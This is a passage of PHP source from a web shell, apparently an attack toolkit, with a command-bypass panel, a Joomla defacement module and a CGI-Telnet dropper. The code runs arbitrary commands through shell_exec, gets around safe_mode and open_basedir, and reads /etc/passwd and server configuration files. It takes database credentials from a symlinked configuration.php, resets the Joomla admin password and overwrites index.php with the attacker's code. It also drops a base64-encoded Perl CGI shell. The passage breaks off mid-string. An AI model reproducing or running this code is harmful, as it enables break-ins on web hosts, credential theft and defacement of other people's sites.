=\'".$set_index."\'") or die(mysql_error());\r\n    if($ok){\r\n    echo "!! update finish !!<br><br>";\r\n    } \r\n  }\r\n}\r\n\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'bypass\')) \r\n{ \r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=bypass" method="post">\r\n\r\n<?php\r\necho "<center/><br/><b><font color=#00ff00>-=[ Command  Bypass Exploit ]=-</font></b><br>\r\n";\r\nprint_r(\'\r\n<pre>\r\n<form method="POST" action="">\r\n<b><font color=#00ff00><b><font color="#00ff00">Command  :=) </font></font></b><input name="baba" type="text" class="inputz" size="34"><input type="submit" class="inputzbut" value="Go">\r\n</form>\r\n<form method="POST" action=""><strong><b><font color="#00ff00">Menu Bypass  :=)  </font></strong><select name="liz0" size="1" class="inputz">\r\n<option value="cat /etc/passwd">/etc/passwd</option>\r\n<option value="netstat -an | grep -i listen">netstat</option>\r\n<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>\r\n<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>\r\n<option value="cat /etc/hosts">/etc/hosts</option>\r\n<option value="cat /etc/named.conf">/etc/named.conf</option>\r\n<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>\r\n</select> <input type="submit" class="inputzbut" value="G&ouml;">\r\n</form>\r\n</pre>\r\n\');\r\nini_restore("safe_mode");\r\nini_restore("open_basedir");\r\n$liz0=shell_exec($_POST[baba]); \r\n$liz0zim=shell_exec($_POST[liz0]); \r\n$uid=shell_exec(\'id\');\r\n$server=shell_exec(\'uname -a\');\r\necho "<pre><h4>";\r\n\r\necho $liz0;\r\necho $liz0zim;\r\necho "</h4></pre>";\r\n "</div>"; }\r\n\r\n ///////////////////////////////////////////////////////////////////////////\r\n \r\n elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'jodexer\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=jodexer" method="post">\r\n\r\n<?php\r\n\r\nfunction randomt() {\r\n    \r\n        $chars = "abcdefghijkmnopqrstuvwxyz023456789";\r\n        srand((double)microtime()*1000000);\r\n        $i = 0;\r\n        $pass = \'\' ;\r\n    \r\n        while ($i <= 7) {\r\n            $num = rand() % 33;\r\n            $tmp = substr($chars, $num, 1);\r\n            $pass = $pass . $tmp;\r\n            $i++;\r\n        }\r\n    \r\n        return $pass;\r\n    \r\n    }\r\n    function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)\r\n    {\r\n    $ar0=explode($marqueurDebutLien, $text);\r\n    $ar1=explode($marqueurFinLien, $ar0[$i]);\r\n    $ar=trim($ar1[0]);\r\n    return $ar;\r\n    }\r\n    if ($_POST[\'form_action\'])\r\n    {\r\n    \r\n    $text=file_get_contents($_POST[\'file\']);\r\n    $username=entre2v2($text,"public $user = \'","\';");\r\n    $password=entre2v2($text,"public $password = \', \'","\';");\r\n    $dbname=entre2v2($text,"public $db = \', \'","\';");\r\n    $dbprefix=entre2v2($text,"public $dbprefix = \'","\';");\r\n    $site_url=($_POST[\'site_url\']);\r\n    \r\n    $h="<? echo(stripslashes(base64_decode(\'".urlencode(base64_encode(str_replace("\'","\'",($_POST[\'code\']))))."\'))); exit; ?>";\r\n    \r\n    $co=randomt();  \r\n      /*\r\n    echo($username);\r\n    echo("<br>");\r\n    echo($password);\r\n    echo("<br>");\r\n    echo($dbname);\r\n    echo("<br>");\r\n    echo($dbprefix);\r\n    echo("<br>");\r\n    */\r\n    $co=randomt();\r\n    \r\n    if ($_POST[\'form_action\'])\r\n    {\r\n    $h="<? echo(stripslashes(base64_decode(\'".urlencode(base64_encode(str_replace("\'","\'",($_POST[\'code\']))))."\'))); exit; ?>";\r\n    \r\n    \r\n    \r\n    \r\n    \r\n          $link=mysql_connect("dzoed.druknet.bt",$username,$password) ;\r\n    \r\n             mysql_select_db($dbname,$link) ;\r\n    \r\n    $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username =\'admin\' , password = \'2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX\'");\r\n    echo("<br>[+] Changing admin password to 123456789");  \r\n                    \r\n                     $req =mysql_query("SELECT * from  `".$dbprefix."extensions` ");\r\n                    \r\n    if ( $req )\r\n    {\r\n    #################################################################\r\n    ######################        V1.6         ######################\r\n    #################################################################\r\n    \r\n                  \r\n    $req =mysql_query("SELECT * from  `".$dbprefix."template_styles` WHERE client_id=\'0\' and home=\'1\'");\r\n             $data = mysql_fetch_array($req);\r\n    $template_name=$data["template"];\r\n    \r\n    $req =mysql_query("SELECT * from  `".$dbprefix."extensions` WHERE name=\'".$template_name."\'");\r\n             $data = mysql_fetch_array($req);\r\n    $template_id=$data["extension_id"];\r\n    \r\n    $url2=$site_url."/index.php";\r\n    \r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 1);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n        curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n        curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    \r\n    \r\n    $buffer = curl_exec($ch);\r\n    \r\n    $return=entre2v2($buffer ,\'<input type="hidden" name="return" value="\',\'"\');\r\n    $hidden=entre2v2($buffer ,\'<input type="hidden" name="\',\'" value="1"\',4);\r\n    \r\n    ///////////////////////////\r\n    $url2=$site_url."/index.php";\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_POST, 1);\r\n    curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $pos = strpos($buffer,"com_config");\r\n    if($pos === false) {\r\n    echo("<br>[-] Login Error");\r\n    exit;\r\n    }\r\n    else {\r\n    echo("<br>[~] Login Successful");\r\n    }\r\n    ///////////////////////////\r\n    $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $hidden2=entre2v2($buffer ,\'<input type="hidden" name="\',\'" value="1"\',2);\r\n    if($hidden2) {\r\n    echo("<br>[+] index.php file founded in Theme Editor");\r\n    }\r\n    else {\r\n    echo("<br>[-] index.php Not found in Theme Editor");\r\n    exit;\r\n    }\r\n    echo("<br>[*] Updating Index.php .....");\r\n    $url2=$site_url."/index.php?option=com_templates&layout=edit";\r\n    \r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_POST, 1);\r\n    curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");\r\n    \r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $pos = strpos($buffer,\'<dd class="message message">\');\r\n    if($pos === false) {\r\n    echo("<br>[-] Updating Index.php Error");\r\n    exit;\r\n    }\r\n    else {\r\n    echo("<br>[~] index.php successfully saved");\r\n    }\r\n    #################################################################\r\n    ######################      V1.6  END      ######################\r\n    #################################################################\r\n    \r\n    \r\n    }\r\n    else\r\n    {\r\n    \r\n    #################################################################\r\n    ######################      V1.5           ######################\r\n    #################################################################\r\n                    \r\n    $req =mysql_query("SELECT * from  `".$dbprefix."templates_menu` WHERE client_id=\'0\'");\r\n             $data = mysql_fetch_array($req);\r\n    $template_name=$data["template"];\r\n    \r\n    $url2=$site_url."/index.php";\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 1);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n        curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n        curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $hidden=entre2v2($buffer ,\'<input type="hidden" name="\',\'" value="1"\',3);\r\n    \r\n    $url2=$site_url."/index.php";\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_POST, 1);\r\n    curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $pos = strpos($buffer,"com_config");\r\n    \r\n    if($pos === false) {\r\n    echo("<br>[-] Login Error");\r\n    exit;\r\n    }\r\n    else {\r\n    echo("<br>[+] Login Successful");\r\n    }\r\n    ///////////////////////////\r\n    $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n        curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n        curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $hidden2=entre2v2($buffer ,\'<input type="hidden" name="\',\'" value="1"\',6);\r\n    \r\n    if($hidden2) {\r\n    echo("<br>[~] index.php file founded in Theme Editor");\r\n    }\r\n    else {\r\n    echo("<br>[-] index.php Not found in Theme Editor");\r\n    }\r\n    \r\n    echo("<br>[*] Updating Index.php .....");\r\n    $url2=$site_url."/index.php?option=com_templates&layout=edit";\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_POST, 1);\r\n    curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n        curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n        curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $pos = strpos($buffer,\'<dd class="message message fade">\');\r\n    if($pos === false) {\r\n    echo("<br>[-] Updating Index.php Error");\r\n    exit;\r\n    }\r\n    else {\r\n    echo("<br>[~] index.php successfully saved");\r\n    }\r\n    #################################################################\r\n    ######################      V1.5  END      ######################\r\n    #################################################################\r\n    \r\n    }\r\n    \r\n    }\r\n    \r\n    \r\n    function randomt() {\r\n    \r\n        $chars = "abcdefghijkmnopqrstuvwxyz023456789";\r\n        srand((double)microtime()*1000000);\r\n        $i = 0;\r\n        $pass = \'\' ;\r\n    \r\n        while ($i <= 7) {\r\n            $num = rand() % 33;\r\n            $tmp = substr($chars, $num, 1);\r\n            $pass = $pass . $tmp;\r\n            $i++;\r\n        }\r\n    \r\n        return $pass;\r\n    \r\n    }\r\n    \r\n    function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)\r\n    \r\n    {\r\n    \r\n    $ar0=explode($marqueurDebutLien, $text);\r\n    $ar1=explode($marqueurFinLien, $ar0[$i]);\r\n    $ar=trim($ar1[0]);\r\n    return $ar;\r\n    }\r\n    \r\n    }?>\r\n    <center><br><br>\r\n    <font color="#00ff00" size=\'+3\'><b>+--=[ Automatic Joomla Index Changer ]=--+</b></font><br><br>\r\n    </center>\r\n    <center><b>\r\n    Link of symlink configuration.php of Joomla<br></b>\r\n    <FORM action=""  method="post">\r\n    <input type="hidden" name="form_action" value="1">\r\n     <input type="text" class="inputz" size="60" name="file" value="http://site.com/sym/home/user/public_html/configuration.php">\r\n    <br>\r\n    <br><b>\r\n    Admin Control panel url</b><br>\r\n    <input type="text" class="inputz" size="40" name="site_url" value="http://site/administrator"><br>\r\n    <br><b>\r\n    Your Index Code</b>\r\n    <br>\r\n    <TEXTAREA rows="20" align="center" style="background:black" cols="120" name="code"> your index code\r\n            </TEXTAREA>\r\n            <br>\r\n    <INPUT  class="inputzbut" type="submit" value="Lets Go Deface !!!" name="Submit">\r\n    </FORM>\r\n     </center>\r\n    <script language=JavaScript>m=\'%09%09%09%09%09%09%09%3C/td%3E%0A%09%09%09%09%09%09%3C/tr%3E%0A%09%09%09%09%09%3C/table%3E%0A%09%09%09%09%3C/td%3E%0A%3C/html%3E\';d=unescape(m);document.write(d);</script>\r\n\t<?php\r\n}\r\n ///////////////////////////////////////////////////////////////////////////\r\n \r\n elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'cgi2012\')) { \r\n echo "<center/><br/><b>\r\n +--==[ CGI-Telnet Version 1.3 ]==--+ \r\n </b><br><br>";\r\n \r\n \r\n    mkdir(\'cgi2012\', 0755);\r\n    chdir(\'cgi2012\');\r\n        $kokdosya = ".htaccess";\r\n        $dosya_adi = "$kokdosya";\r\n        $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;&#305;lamad&#305;!");\r\n        $metin = "AddHandler cgi-script .izo";    \r\n        fwrite ( $dosya , $metin ) ;\r\n        fclose ($dosya);\r\n$cgi2012 = \'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluCnVzZSBNSU1FOjpCYXNlNjQ7CiRWZXJzaW9uPSAiQ0dJLVRlbG5ldCBWZXJzaW9uIDEuMyI7CiRFZGl0UGVyc2lvbj0iPGZvbnQgc3R5bGU9J3RleHQtc2hhZG93OiAwcHggMHB4IDZweCByZ2IoMjU1LCAwLCAwKSwgMHB4IDBweCA1cHggcmdiKDMwMCwgMCwgMCksIDBweCAwcHggNXB4IHJnYigzMDAsIDAsIDApOyBjb2xvcjojZmZmZmZmOyBmb250LXdlaWdodDpib2xkOyc+YjM3NGsgLSBDR0ktVGVsbmV0PC9mb250PiI7CgokUGFzc3dvcmQgPSAiYmFuZHVuZ2tvdGFzYW1wYWgiOwkJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4Kc3ViIElzX1dpbigpewoJJG9zID0gJnRyaW0oJEVOVnsiU0VSVkVSX1NPRlRXQVJFIn0pOwoJaWYoJG9zID1+IG0vd2luL2kpewoJCXJldHVybiAxOwoJfQoJZWxzZXsKCQlyZXR1cm4gMDsKCX0KfQokV2luTlQgPSAmSXNfV2luKCk7CQkJCSMgWW91IG5lZWQgdG8gY2hhbmdlIHRoZSB2YWx1ZSBvZiB0aGlzIHRvIDEgaWYKCQkJCQkJCQkjIHlvdSdyZSBydW5uaW5nIHRoaXMgc2NyaXB0IG9uIGEgV2luZG93cyBOVAoJCQkJCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkJCQkJIyBjYW4gbGVhdmUgdGhlIHZhbHVlIGFzIGl0IGlzLgoKJE5UQ21kU2VwID0gIiYiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJCQkJCSMgaW4gYSBjb21tYW5kIGxpbmUgb24gV2luZG93cyBOVC4KCiRVbml4Q21kU2VwID0gIjsiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJCQkJCSMgaW4gYSBjb21tYW5kIGxpbmUgb24gVW5peC4KCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTAwMDA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkCgkJCQkJCQkJIyBEb24ndCBzZXQgdGhpcyB0byBhIHZlcnkgbGFyZ2UgdmFsdWUuIFRoaXMgaXMKCQkJCQkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkJCQkJIyB0YWtlIHZlcnkgbG9uZyB0byBleGVjdXRlLCBsaWtlICJmaW5kIC8iLgoJCQkJCQkJCSMgVGhpcyBpcyB2YWxpZCBvbmx5IG9uIFVuaXggc2VydmVycy4gSXQgaXMKCQkJCQkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkJIyBJZiB0aGlzIGlzIDEsIHRoZW4gZGF0YSBpcyBzZW50IHRvIHRoZQoJCQkJCQkJCSMgYnJvd3NlciBhcyBzb29uIGFzIGl0IGlzIG91dHB1dCwgb3RoZXJ3aXNlCgkJCQkJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkJCQkJIyBjb21wbGV0ZXMuIFRoaXMgaXMgdXNlZnVsIGZvciBjb21tYW5kcyBsaWtlCgkJCQkJCQkJIyBwaW5nLCBzbyB0aGF0IHlvdSBjYW4gc2VlIHRoZSBvdXRwdXQgYXMgaXQKCQkJCQkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwokY29scz0gMTUwOwokcm93cz0gMjY7CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBSZWFkcyB0aGUgaW5wdXQgc2VudCBieSB0aGUgYnJvd3NlciBhbmQgcGFyc2VzIHRoZSBpbnB1dCB2YXJpYWJsZXMuIEl0CiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlwYXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4KIyBUaGUgZmlsZW5hbWUgaXMgc3RvcmVkIGluICRpbnsnZid9IGFuZCB0aGUgZGF0YSBpcyBzdG9yZWQgaW4gJGlueydmaWxlZGF0YSd9LgojIE90aGVyIHZhcmlhYmxlcyBjYW4gYmUgYWNjZXNzZWQgdXNpbmcgJGlueyd2YXInfSwgd2hlcmUgdmFyIGlzIHRoZSBuYW1lIG9mCiMgdGhlIHZhcmlhYmxlLiBOb3RlOiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBDR0kKIyBzY3JpcHRzLgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBSZWFkUGFyc2UgCnsKCWxvY2FsICgqaW4pID0gQF8gaWYgQF87Cglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwpOwoJCgkkTXVsdGlwYXJ0Rm9ybURhdGEgPSAkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLzsKCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQoJewoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9OwoJfQoJZWxzaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiUE9TVCIpCgl7CgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOwoJCXJlYWQoU1RESU4sICRpbiwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7Cgl9CgoJIyBoYW5kbGUgZmlsZSB1cGxvYWQgZGF0YQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pCgl7CgkJJEJvdW5kYXJ5ID0gJy0tJy4kMTsgIyBwbGVhc2UgcmVmZXIgdG8gUkZDMTg2NyAKCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyAKCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOwoJCSRIZWFkZXJCb2R5ID1+IC9cclxuXHJcbnxcblxuLzsKCQkkSGVhZGVyID0gJGA7CgkJJEJvZHkgPSAkJzsKIAkJJEJvZHkgPX4gcy9cclxuJC8vOyAjIHRoZSBsYXN0IFxyXG4gd2FzIHB1dCBpbiBieSBOZXRzY2FwZQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5OwoJCSRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsgCgkJJGlueydmJ30gPSAkMTsgCgkJJGlueydmJ30gPX4gcy9cIi8vZzsKCQkkaW57J2YnfSA9fiBzL1xzLy9nOwoKCQkjIHBhcnNlIHRyYWlsZXIKCQlmb3IoJGk9MjsgJGxpc3RbJGldOyAkaSsrKQoJCXsgCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOwoJCQkkbGlzdFskaV0gPX4gL1wiKFx3KylcIi87CgkJCSRrZXkgPSAkMTsKCQkJJHZhbCA9ICQnOwoJCQkkdmFsID1+IHMvKF4oXHJcblxyXG58XG5cbikpfChcclxuJHxcbiQpLy9nOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gPSAkdmFsOyAKCQl9Cgl9CgllbHNlICMgc3RhbmRhcmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkKCXsKCQlAaW4gPSBzcGxpdCgvJi8sICRpbik7CgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQoJCXsKCQkJJGluWyRpXSA9fiBzL1wrLyAvZzsKCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsKCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRlZmluZWQoJGlueyRrZXl9KSk7CgkJCSRpbnska2V5fSAuPSAkdmFsOwoJCX0KCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBQYWdlIEhlYWRlcgojIEFyZ3VtZW50IDE6IEZvcm0gaXRlbSBuYW1lIHRvIHdoaWNoIGZvY3VzIHNob3VsZCBiZSBzZXQKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRQYWdlSGVhZGVyCnsKCSRFbmNvZGVkQ3VycmVudERpciA9ICRDdXJyZW50RGlyOwoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCW15ICRkaXIgPSRDdXJyZW50RGlyOwoJJGRpcj1+IHMvXFwvXFxcXC9nOwoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7CglwcmludCA8PEVORDsKPGh0bWw+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+Cjx0aXRsZT5IYWNzdWdpYTwvdGl0bGU+CgokSHRtbE1ldGFIZWFkZXIKCjwvaGVhZD4KPHN0eWxlPgpib2R5ewpmb250OiAxMHB0IFZlcmRhbmE7Cn0KdHIgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKY29sb3I6ICNmZjk5MDA7Cn0KdGQgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKY29sb3I6ICMyQkE4RUM7CmZvbnQ6IDEwcHQgVmVyZGFuYTsKfQoKdGFibGUgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKQkFDS0dST1VORC1DT0xPUjogIzExMTsKfQoKCmlucHV0IHsKQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7CkJBQ0tHUk9VTkQtQ09MT1I6IEJsYWNrOwpmb250OiAxMHB0IFZlcmRhbmE7CmNvbG9yOiAjZmY5OTAwOwp9CgppbnB1dC5zdWJtaXQgewp0ZXh0LXNoYWRvdzogMHB0IDBwdCAwLjNlbSBjeWFuLCAwcHQgMHB0IDAuM2VtIGN5YW47CmNvbG9yOiAjRkZGRkZGOwpib3JkZXItY29sb3I6ICMwMDk5MDA7Cn0KCmNvZGUgewpib3JkZXIJCQk6IGRhc2hlZCAwcHggIzMzMzsKQkFDS0dST1VORC1DT0xPUjogQmxhY2s7CmZvbnQ6IDEwcHQgVmVyZGFuYSBib2xkOwpjb2xvcjogd2hpbGU7Cn0KCnJ1biB7CmJvcmRlcgkJCTogZGFzaGVkIDBweCAjMzMzOwpmb250OiAxMHB0IFZlcmRhbmEgYm9sZDsKY29sb3I6ICNGRjAwQUE7Cn0KCnRleHRhcmVhIHsKQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLU